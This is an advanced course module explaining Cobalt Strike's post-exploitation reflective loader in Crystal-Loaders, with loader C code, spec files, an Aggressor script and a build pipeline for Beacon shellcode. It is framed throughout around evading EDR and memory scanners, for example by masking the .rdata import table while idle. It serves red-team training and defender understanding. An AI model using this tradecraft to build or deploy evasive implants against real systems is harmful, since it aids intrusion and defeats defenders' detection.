Difficulty: Advanced

Module 7: Post-Ex UDRL & Aggressor Integration

The postex loader, $GMH/$GPA patching, string-based DFR, Aggressor hooks, and the complete build pipeline from C source to deployed Beacon.

Module Objective

Understand how Cobalt Strike's post-exploitation DLLs are loaded by a separate, simplified UDRL. You will learn how the postex loader differs from the Beacon UDRL, how it receives API resolution capabilities from its parent Beacon via $GMH/$GPA patching, and how the Aggressor script ties the entire Crystal-Loaders system together. By the end of this module you will be able to trace a complete payload from C source through Crystal Palace to a running Beacon on target.

1. What Is Post-Ex?

Cobalt Strike's post-exploitation capabilities — mimikatz, screenshot, keylogger, port scan, hashdump, net commands, and many others — are implemented as standalone DLLs. When an operator runs one of these commands through the Beacon console, Cobalt Strike compiles or selects the appropriate postex DLL and sends it to the running Beacon for execution.

These postex DLLs need their own loader. The initial Beacon UDRL (covered in Modules 5 and 6) loads the Beacon implant itself, but every subsequent postex capability that arrives as a DLL also needs to be reflectively loaded into memory. Cobalt Strike provides a dedicated hook for this purpose: POSTEX_RDLL_GENERATE.

Why a Separate Loader?

The postex loader is architecturally simpler than the Beacon UDRL because it operates in a fundamentally different context. The Beacon is already running, API resolution is already solved, syscall stubs are already resolved, and the BUD (Beacon User Data) is already populated. The postex loader does not need to bootstrap any of this infrastructure — it inherits resolution capabilities from its parent Beacon via function pointer patching.

Key Distinction

The POSTEX_RDLL_GENERATE Aggressor hook allows operators to replace the default postex loader with a custom one — just as BEACON_RDLL_GENERATE allows replacing the Beacon's own loader. Crystal-Loaders provides both: a full-featured Beacon UDRL and a streamlined postex UDRL, each with its own spec file and C source.

2. Key Differences from the Beacon UDRL

The postex loader shares the same Crystal Palace build system and LibTCG PE loading primitives as the Beacon UDRL, but it strips away everything that the parent Beacon already provides. The following table highlights every architectural difference:

| Aspect | Beacon UDRL (loader.c) | Post-Ex UDRL (loader.c) |
|---|---|---|
| Includes | beacon.h, gate.h, tcg.h | tcg.h only |
| Syscall resolution | Full SYSCALL_API via LibGate | None needed |
| DFR method | ror13 (hash-based) | strings (ASCII name-based) |
| API resolution | PEB walking via findModuleByHash | $GMH/$GPA from parent Beacon |
| BUD population | Full BEACON_USER_DATA | None |
| Entry params | go() takes no args | go(void* loaderArguments) |
| DllMain calls | 3 (BEACON_USER_DATA, ATTACH, START) | 2 (ATTACH, START) |
| Memory tracking | ALLOCATED_MEMORY_REGION | RDATA_SECTION |
| Section masking | Full section tracking | .rdata capture only |

The most striking reduction is in dependencies. The Beacon UDRL includes beacon.h (for BUD structures), gate.h (for LibGate syscalls), and tcg.h (for PE loading). The postex loader only needs tcg.h because it does not resolve syscalls and does not populate BUD. It is purely a PE loading engine with inherited API resolution.

Why This Matters for Evasion

A smaller loader means a smaller PIC blob, which means less code in memory to scan, fewer function calls to trace, and a reduced detection surface. The postex loader also avoids touching the PEB directly (it uses patched-in function pointers instead of PEB walking), which sidesteps PEB access monitoring that some EDR products implement.

3. The $GMH / $GPA Patching Mechanism

The central design question for the postex loader is: how does it resolve Windows API functions without PEB walking and without LibGate? The answer is function pointer patching. The parent Beacon already has resolved addresses for GetModuleHandleA and GetProcAddress. Crystal Palace writes those addresses directly into the postex loader's code before it executes.

Global Function Pointers in .text

The postex loader.c declares two global function pointers with an unusual attribute — they are placed in the .text section instead of .data:

C (postex/loader.c)
// Global function pointers stored in .text section
__typeof__(GetModuleHandleA) * pGetModuleHandle __attribute__((section(".text")));
__typeof__(GetProcAddress)   * pGetProcAddress  __attribute__((section(".text")));

Placing them in .text is deliberate. After Crystal Palace transforms the COFF object into PIC, the .text section becomes the executable code body. By placing the pointers here, they become part of the PIC blob itself — directly addressable via RIP-relative instructions. If they were in .data, Crystal Palace would need to handle an additional data section and relocations.

The patch Directive

The postex spec file uses Crystal Palace's patch directive to write values into these symbol locations:

loader.spec (postex)
name     "Beacon Postex Loader"
describe "PIC loader for Cobalt Strike's postex DLLs"
author   "Daniel Duggan (@_RastaMouse)"

x64:
    load "bin/loader.x64.o"
        make pic +gofirst +optimize +disco
        dfr "resolve" "strings"
        patch "pGetModuleHandle" $GMH
        patch "pGetProcAddress"  $GPA
        mergelib "../libtcg.x64.zip"

    generate $KEY 128
    push $DLL
        xor $KEY
        preplen
        link "dll"
    push $KEY
        preplen
        link "key"
    export

The $GMH and $GPA variables are not defined in the spec itself. They are provided externally by the Aggressor script at runtime, which receives them from Cobalt Strike as parameters to the POSTEX_RDLL_GENERATE hook. Crystal Palace resolves the symbol names "pGetModuleHandle" and "pGetProcAddress" in the COFF object's symbol table and overwrites those locations with the 8-byte addresses provided by $GMH and $GPA.
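The effect of a patch step can be pictured as a bounded 8-byte copy into a pointer-sized slot. The following is a minimal sketch in portable C, not Crystal Palace's implementation: patch_pointer, read_pointer, and the offsets are hypothetical names chosen for illustration, and the symbol-table lookup that yields the slot offset is assumed to have already happened.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for a linker's patch step: copy an 8-byte value
 * over a pointer-sized slot at a known offset inside the blob. */
static int patch_pointer(uint8_t *blob, size_t blob_len,
                         size_t slot_offset, uint64_t address)
{
    /* Reject a slot that would run past the end of the blob. */
    if (slot_offset > blob_len || blob_len - slot_offset < sizeof address)
        return -1;
    memcpy(blob + slot_offset, &address, sizeof address);
    return 0;
}

/* Read the slot back the way code loading the pointer would see it. */
static uint64_t read_pointer(const uint8_t *blob, size_t slot_offset)
{
    uint64_t value;
    memcpy(&value, blob + slot_offset, sizeof value);
    return value;
}
```

Because the value is written in the host's byte order and read back the same way, the sketch round-trips on any platform; on x64 that order is little-endian.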

$GMH / $GPA Patching Flow

  1. Parent Beacon: has resolved GMH/GPA
  2. CS Engine: passes to Aggressor hook
  3. Crystal Palace: patch directive
  4. PIC Blob: pointers baked in .text

Comparing Spec Directives: Beacon vs Post-Ex

| Directive | Beacon Spec | Post-Ex Spec |
|---|---|---|
| dfr | "resolve" "ror13" | "resolve" "strings" |
| patch | Not used | patch "pGetModuleHandle" $GMH and patch "pGetProcAddress" $GPA |
| mergelib | LibGate + LibTCG | LibTCG only |

4. The Post-Ex resolve() Function

Because the postex spec uses dfr "resolve" "strings", Crystal Palace rewrites all __imp_MODULE$Function references to call resolve() with ASCII string arguments instead of ROR13 hashes. The postex resolve() function is correspondingly different from the Beacon UDRL's version:

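C (postex/loader.c)
char * resolve(char * module, char * function)
{
    // Look up the module through the patched $GMH pointer
    HANDLE hModule = pGetModuleHandle(module);

    // Not loaded yet: load it before resolving the export
    if (hModule == NULL)
        hModule = LoadLibraryA(module);

    // Resolve the export through the patched $GPA pointer
    return pGetProcAddress(hModule, function);
}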

This function is deceptively simple, but every line is significant:

Line-by-Line Analysis

| Line | What It Does |
|---|---|
| pGetModuleHandle(module) | Attempts to get a handle to the module using the patched $GMH pointer. This succeeds if the DLL is already loaded in the process (e.g., kernel32.dll, ntdll.dll). |
| if (hModule == NULL) | If the module is not already loaded, the function needs to load it first. This happens when postex DLLs import from less common DLLs. |
| LoadLibraryA(module) | Calls LoadLibraryA directly to load the module. This is available as a plain function call because it comes from <windows.h> and is not DFR-decorated. |
| pGetProcAddress(hModule, function) | Finally resolves the target function from the (now loaded) module and returns its address. |

Comparison with Beacon UDRL resolve()

Beacon UDRL resolve()
  • Takes two DWORD hashes (ROR13)
  • Walks the PEB's InMemoryOrderModuleList
  • Hashes each module name, compares against moduleHash
  • Walks export table, hashes each function name
  • No dependency on any external function pointers
  • Fully self-contained — works from a cold start
Post-Ex resolve()
  • Takes two ASCII strings (module name, function name)
  • Calls pGetModuleHandle (patched $GMH)
  • Falls back to LoadLibraryA (direct call, not DFR-decorated) if module not loaded
  • Calls pGetProcAddress (patched $GPA)
  • Depends on parent Beacon's function pointers
  • Cannot operate independently — requires a running Beacon
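To make the hash-based side of this comparison concrete, here is a minimal sketch of the classic ROR13 name hash in portable C. It illustrates the general technique only; the exact variant Crystal Palace emits (case folding, whether the terminator is hashed, how module names are normalized) is not stated in this module, so the choices below are assumptions, and ror32 and ror13_hash are illustrative names.

```c
#include <stdint.h>

/* Rotate a 32-bit value right by n bits (0 < n < 32). */
static uint32_t ror32(uint32_t v, unsigned n)
{
    return (v >> n) | (v << (32u - n));
}

/* Classic ROR13 name hash: rotate the running hash right by 13,
 * then add the next byte.
 * Assumptions: case-sensitive input, terminator not hashed. */
static uint32_t ror13_hash(const char *name)
{
    uint32_t h = 0;
    for (const unsigned char *p = (const unsigned char *)name; *p; p++)
        h = ror32(h, 13) + *p;
    return h;
}
```

A hash-based resolver compares values like these against each export name it walks, so no API name strings need to appear in the loader. The string-based postex resolver trades that property for simplicity, since it can hand the names straight to the patched pointers.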

5. RDATA_SECTION Tracking

The Beacon UDRL tracks all allocated memory regions via ALLOCATED_MEMORY_REGION structures in the BUD. The postex loader uses a simpler tracking mechanism: it captures only the .rdata section's location and size.

C (postex/loader.c)
typedef struct {
    char * start;      // Start address of .rdata
    DWORD  length;     // Size of .rdata
    DWORD  offset;     // Offset of IAT within .rdata
} RDATA_SECTION;

Why Track .rdata?

Long-running postex DLLs (such as the keylogger, screenshot capture loop, or port scanner) persist in memory for extended periods. While they are idle between operations, their memory is vulnerable to scanning. The .rdata section is the highest-value forensic target because of what it contains.

What Lives in .rdata

The resolved Import Address Table (IAT) lives in .rdata. It holds function pointers that memory scanners can identify as evidence of a loaded PE.

By passing the RDATA_SECTION structure to the postex DLL via DllMain(DLL_PROCESS_ATTACH, &rdata), the DLL can XOR-encrypt or zero its own .rdata section while idle. When it needs to run again, it decrypts the section, performs its operation, and re-encrypts. This pattern is the postex equivalent of the sleep mask technique used by the Beacon itself.
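The encrypt-while-idle pattern relies on XOR being its own inverse: applying the same key twice restores the original bytes. The sketch below shows that round trip over an ordinary buffer in portable C. It is an illustration under stated assumptions, not the postex DLL's code: rdata_section mirrors the RDATA_SECTION layout with portable types, toggle_mask is a hypothetical helper, the whole region is masked, and the offset field is ignored. A real .rdata section is mapped read-only, so page protections would have to be handled separately.

```c
#include <stddef.h>
#include <stdint.h>

/* Mirrors the RDATA_SECTION layout shown above, with portable types. */
typedef struct {
    char    *start;   /* start address of the tracked region */
    uint32_t length;  /* size of the region in bytes */
    uint32_t offset;  /* offset of the IAT within the region (unused here) */
} rdata_section;

/* XOR the whole region with a repeating key.
 * Calling it a second time with the same key restores the original bytes. */
static void toggle_mask(const rdata_section *r,
                        const uint8_t *key, size_t key_len)
{
    if (key_len == 0)
        return; /* nothing sensible to do without a key */
    for (uint32_t i = 0; i < r->length; i++)
        r->start[i] ^= (char)key[i % key_len];
}
```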

RDATA Obfuscation Lifecycle

  1. Postex DLL loaded: .rdata populated with IAT
  2. Operation completes: keylogger cycle done
  3. XOR encrypt .rdata: using RDATA_SECTION info
  4. Idle (safe): no readable IAT in memory

6. The Post-Ex go() Function

The postex go() function is the entry point of the PIC blob. Crystal Palace places it at byte offset 0 via the +gofirst flag. Unlike the Beacon UDRL's go() (which takes no arguments), the postex version receives a loaderArguments pointer from the parent Beacon:

C (postex/loader.c)
void go(void * loaderArguments)
{
    RESOURCE * dll = (RESOURCE *)GETRESOURCE(_DLL_);
    RESOURCE * key = (RESOURCE *)GETRESOURCE(_KEY_);

    // XOR unmask the encrypted postex DLL
    char * src = KERNEL32$VirtualAlloc(
        NULL, dll->length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    for (DWORD i = 0; i < dll->length; i++)
        src[i] = dll->value[i] ^ key->value[i % key->length];

    // Parse the decrypted PE
    DLLDATA data;
    ParseDLL(src, &data);

    // Allocate and load sections
    IMPORTFUNCS funcs;
    DWORD size = SizeOfDLL(&data);
    char * dst = KERNEL32$VirtualAlloc(
        NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LoadDLL(&data, dst);
    ProcessImports(&funcs, &data, dst);

    // Fix permissions and capture .rdata info
    RDATA_SECTION rdata;
    FixSectionPermissions(&data, dst, &rdata);

    // Get entry point and clean up decryption buffer
    DLLMAIN_FUNC entryPoint = (DLLMAIN_FUNC)EntryPoint(&data, dst);
    KERNEL32$VirtualFree(src, 0, MEM_RELEASE);

    // Two DllMain calls (no USER_DATA needed)
    entryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, &rdata);               // pass rdata info
    entryPoint((HINSTANCE)GETRESOURCE(go), 0x04, loaderArguments);  // start with loader args
}

Each phase of this function maps directly to a stage in the loading process:

Phase-by-Phase Breakdown

| Phase | Lines | What Happens |
|---|---|---|
| Resource Retrieval | GETRESOURCE | The _DLL_ and _KEY_ macros resolve to named sections that Crystal Palace linked into the PIC blob. GETRESOURCE uses RIP-relative addressing to locate them. |
| XOR Decryption | VirtualAlloc + XOR loop | Allocates a RW buffer (src) and decrypts the postex DLL using a rolling XOR with the 128-byte key. The decrypted buffer is a raw PE file. |
| PE Parsing | ParseDLL | LibTCG parses the PE headers, section table, import directory, and relocation table into a DLLDATA structure. |
| Section Loading | VirtualAlloc + LoadDLL | VirtualAlloc reserves the final image region (RW), sized by SizeOfDLL. LoadDLL then copies each PE section to its correct virtual address offset. |
| Import Resolution | ProcessImports | Takes an IMPORTFUNCS struct, the DLLDATA, and dst. Walks the import directory and resolves each function using the DFR-rewritten resolve(), which delegates to the patched $GMH/$GPA. |
| Permission Fixing | FixSectionPermissions | Sets correct page protections for each section (.text to RX, .rdata to R, .data to RW). Captures .rdata boundaries into the RDATA_SECTION struct. |
| Cleanup | VirtualFree | Releases the temporary decryption buffer (src). Once the sections have been copied into dst and the entry point computed, the raw decrypted PE is no longer needed. |
| DllMain #1 | DLL_PROCESS_ATTACH | Calls the postex DLL's entry point with (HINSTANCE)dst and &rdata as the reserved parameter, giving it the information needed for .rdata obfuscation. |
| DllMain #2 | 0x04 | Calls DllMain again with reason 0x04, passing (HINSTANCE)GETRESOURCE(go) as the module handle and loaderArguments from the parent Beacon, starting the actual postex operation (mimikatz dump, screenshot capture, etc.). |
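The resource retrieval and XOR decryption phases can be sketched in portable C without any Windows dependencies. This is an illustration under assumptions, not LibTCG code: it assumes preplen prepends a 4-byte length in host byte order, and resource_view, read_resource, and unmask are hypothetical names. Unlike the loop in go(), the sketch validates the length prefix before using it.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed record layout: 4-byte length, then that many payload bytes. */
typedef struct {
    uint32_t       length;
    const uint8_t *value;
} resource_view;

/* Parse a length-prefixed record, rejecting a prefix that overruns the input. */
static int read_resource(const uint8_t *raw, size_t raw_len, resource_view *out)
{
    uint32_t len;
    if (raw_len < sizeof len)
        return -1;
    memcpy(&len, raw, sizeof len);
    if (len > raw_len - sizeof len)
        return -1;
    out->length = len;
    out->value  = raw + sizeof len;
    return 0;
}

/* Unmask src into dst with a repeating key, as in the XOR loop in go(). */
static int unmask(uint8_t *dst, const resource_view *src,
                  const resource_view *key)
{
    if (key->length == 0)
        return -1; /* avoid a modulo-by-zero */
    for (uint32_t i = 0; i < src->length; i++)
        dst[i] = src->value[i] ^ key->value[i % key->length];
    return 0;
}
```

The i % key->length index is what makes the key "rolling": a 128-byte key simply repeats across a payload of any length.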

Contrast with Beacon UDRL go()

The Beacon UDRL's go() function makes three DllMain calls:

Beacon UDRL: Three DllMain Calls

  1. entryPoint((HINSTANCE)0, DLL_BEACON_USER_DATA, &bud) — passes the BEACON_USER_DATA structure using the special DLL_BEACON_USER_DATA reason code and (HINSTANCE)0 as the module handle
  2. entryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, NULL) — standard DLL initialization with the actual loaded image base
  3. entryPoint((HINSTANCE)GETRESOURCE(go), DLL_BEACON_START, NULL) — starts the Beacon main loop

The postex loader skips the first call entirely because there is no BEACON_USER_DATA to pass. Postex DLLs do not need syscall stubs or memory region tracking — they operate within the context of an already-running Beacon that handles those concerns.

7. The Aggressor Script (crystalpalace.cna)

The Aggressor script is the glue that connects Crystal Palace to Cobalt Strike's runtime. It implements the hooks that Cobalt Strike calls when it needs to generate loader payloads, passing the appropriate parameters to the Crystal Palace linker.

Java/Sleep (crystalpalace.cna)
import crystalpalace.spec.* from: crystalpalace.jar;
import java.util.HashMap;

set BEACON_RDLL_GENERATE {
    local('$spec $spec_path $result');

    # $1 = filename, $2 = beacon DLL bytes, $3 = arch
    if ($3 eq "x86") { return $null; }  # x64 only

    $spec_path = getFileProper(script_resource("udrl"), "loader.spec");
    $spec = [LinkSpec Parse: $spec_path];
    $result = [$spec run: $2, [new HashMap]];

    if (strlen($result) == 0) {
        warn("Crystal Palace: BEACON_RDLL_GENERATE failed");
        return $null;
    }

    return $result;
}

set BEACON_RDLL_SIZE {
    return "0";  # no fixed loader size reserved
}

set POSTEX_RDLL_GENERATE {
    local('$spec $spec_path $hashMap $result');

    # $1 = filename, $2 = postex DLL bytes, $3 = arch
    # $4 = beacon ID, $5 = $GMH, $6 = $GPA
    if ($3 eq "x86") { return $null; }  # x64 only

    $spec_path = getFileProper(script_resource("postex-udrl"), "loader.spec");
    $spec = [LinkSpec Parse: $spec_path];
    $hashMap = [new HashMap];
    [$hashMap put: "\$GMH", cast($5, 'b')];
    [$hashMap put: "\$GPA", cast($6, 'b')];

    $result = [$spec run: $2, $hashMap];

    if (strlen($result) == 0) {
        warn("Crystal Palace: POSTEX_RDLL_GENERATE failed");
        return $null;
    }

    return $result;
}

The three hooks each serve a distinct purpose in the payload generation pipeline. Note that in Cobalt Strike's Sleep language, the set keyword assigns named hook callbacks (such as RDLL hooks), while on registers event handlers — these are different mechanisms. The import java.util.HashMap at the top makes the Java HashMap class available for passing patch variables.

BEACON_RDLL_GENERATE

Hook: BEACON_RDLL_GENERATE

When it fires: Every time Cobalt Strike generates a Beacon payload (HTTP listener, HTTPS listener, SMB pipe, etc.).

Parameters received:

  • $1: the payload filename
  • $2: the Beacon DLL bytes
  • $3: the architecture

What it does: Uses getFileProper to construct the spec file path and calls LinkSpec Parse to load the Beacon UDRL spec. Feeds it the Beacon DLL bytes (which become $DLL in the spec) and returns the complete PIC payload. The new HashMap is empty because the Beacon spec has no external variables to patch. Includes error handling: if the result has strlen() == 0, a warn() fallback fires and $null is returned.

Return value: The final PIC shellcode blob, or $null if the architecture is x86 (Crystal-Loaders is x64-only) or if Crystal Palace fails.

BEACON_RDLL_SIZE

Hook: BEACON_RDLL_SIZE

When it fires: Before BEACON_RDLL_GENERATE, to determine how much space to reserve for the loader.

Return value: "0" tells Cobalt Strike not to reserve a fixed amount of space inside the Beacon DLL for a reflective loader. That suits this design because the loader is not embedded in the DLL: Crystal Palace builds a separate PIC blob that carries the DLL, and its exact size is determined at link time from the code, libraries, and encrypted payload.

POSTEX_RDLL_GENERATE

Hook: POSTEX_RDLL_GENERATE

When it fires: Every time an operator runs a postex command (mimikatz, screenshot, keylogger, etc.) that requires loading a DLL into the Beacon process.

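Parameters received:

  • $1: the postex DLL filename
  • $2: the postex DLL bytes
  • $3: the architecture
  • $4: the parent Beacon ID
  • $5: the GetModuleHandleA address ($GMH)
  • $6: the GetProcAddress address ($GPA)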

What it does: Uses getFileProper to construct the spec file path and calls LinkSpec Parse to load the postex spec. Constructs a HashMap containing $GMH and $GPA as byte arrays (via cast($5, 'b')), and passes both the DLL bytes and the hash map to Crystal Palace. The patch directives in the spec resolve $GMH and $GPA from this hash map. Includes error handling: if the result has strlen() == 0, a warn() fallback fires and $null is returned.

Return value: The complete postex PIC payload with patched-in function pointers, or $null on failure.

The HashMap is the Bridge

The key insight is how data flows from Cobalt Strike through Aggressor into Crystal Palace. The $GMH and $GPA values originate from the running Beacon on the target machine. Cobalt Strike resolves them from Beacon's process context, passes them as parameters to the Aggressor hook, and the script packages them into a HashMap that Crystal Palace reads when processing patch directives. By the time the PIC blob is assembled, the correct function addresses are baked directly into the shellcode's .text section.

8. The Full Build Pipeline

From writing C source code to a running Beacon on target, the Crystal-Loaders system involves eight distinct stages. The following diagram traces the complete pipeline:

Complete Crystal-Loaders Build Pipeline

1. Write C Loader — Author loader.c with go() entry point, resolve() function, and PE loading logic using LibTCG primitives.
2. Compile with MinGW: x86_64-w64-mingw32-gcc -c loader.c -o bin/loader.x64.o produces a COFF object file. The -c flag stops before linking.
3. Write Spec File — Author loader.spec defining the PIC transformation, DFR method, library merges, payload encryption, and data linking.
4. CS Triggers Hook — At runtime, Cobalt Strike fires BEACON_RDLL_GENERATE (or POSTEX_RDLL_GENERATE), passing the raw DLL bytes and architecture info to the Aggressor script.
5. Aggressor Loads Spec — The .cna script calls LinkSpec Parse to load and parse the spec file, preparing the Crystal Palace linker engine.
6. Crystal Palace Executes — The linker performs six sub-operations:

Crystal Palace Sub-Operations (Step 6)

| Sub-Step | Operation | Result |
|---|---|---|
| 6a | Load loader.x64.o | COFF object loaded into linker memory |
| 6b | make pic +gofirst +optimize +disco | COFF transformed to PIC with go() at offset 0 |
| 6c | dfr "resolve" "ror13" (or "strings") | All DLL import references rewritten to call resolve() |
| 6d | mergelib LibGate + LibTCG (or LibTCG only) | Library code merged into the PIC blob |
| 6e | generate $KEY 128 | 128-byte random XOR key created |
| 6f | push $DLL / xor / preplen / link | DLL XOR-encrypted, length-prefixed, linked as named section |
7. CS Wraps PIC Blob — Cobalt Strike takes the exported PIC blob and wraps it into the appropriate delivery mechanism (stager shellcode, staged payload, or raw artifact).
8. Execution on Target — The stager delivers the PIC blob to the target process. Execution begins at byte 0 (go()). The loader decrypts the embedded DLL, loads it via LibTCG, resolves imports via DFR, and calls DllMain to start Beacon.

Pipeline Summary

The pipeline transforms human-readable C code into a flat, encrypted, position-independent shellcode blob that loads a full-featured DLL implant from memory. A complete raw PE file exists in the target process's memory only briefly: the DLL is encrypted inside the PIC blob, decrypted into a temporary buffer, loaded section-by-section into a final allocation, and the temporary buffer is then freed. The only persistent artifacts are the PIC code itself (which has no PE headers) and the loaded DLL sections (which have correct per-section permissions instead of a single RWX blob).

Module 7 Knowledge Check

Q1: How does the postex loader resolve Windows API functions?

The postex loader declares global function pointers (pGetModuleHandle and pGetProcAddress) in the .text section. Crystal Palace's patch directive writes the parent Beacon's GetModuleHandleA ($GMH) and GetProcAddress ($GPA) addresses into these locations at link time. The postex resolve() function then uses these patched pointers to resolve all API imports. No PEB walking or syscalls are needed.

Q2: What Aggressor hook handles Beacon UDRL generation?

BEACON_RDLL_GENERATE fires every time Cobalt Strike generates a Beacon payload. It receives the raw Beacon DLL bytes, architecture string, and filename hint. The Aggressor script loads the Beacon UDRL spec file and returns the Crystal Palace PIC output. The other hooks do different jobs: POSTEX_RDLL_GENERATE handles postex DLL loading, BEACON_RDLL_SIZE reports the loader size, and ARTIFACT_GENERATE handles artifact packaging.

Q3: Why does the postex loader track RDATA_SECTION instead of full ALLOCATED_MEMORY?

Long-running postex DLLs like keyloggers and screenshot loops persist in memory for extended periods. Their .rdata section contains the resolved Import Address Table (IAT), which holds function pointers that memory scanners can identify as evidence of a loaded PE. By tracking the .rdata section's start address, size, and IAT offset via the RDATA_SECTION structure, the postex DLL can XOR-encrypt its own .rdata while idle and decrypt it only when actively executing, similar to how the Beacon's sleep mask protects its own memory.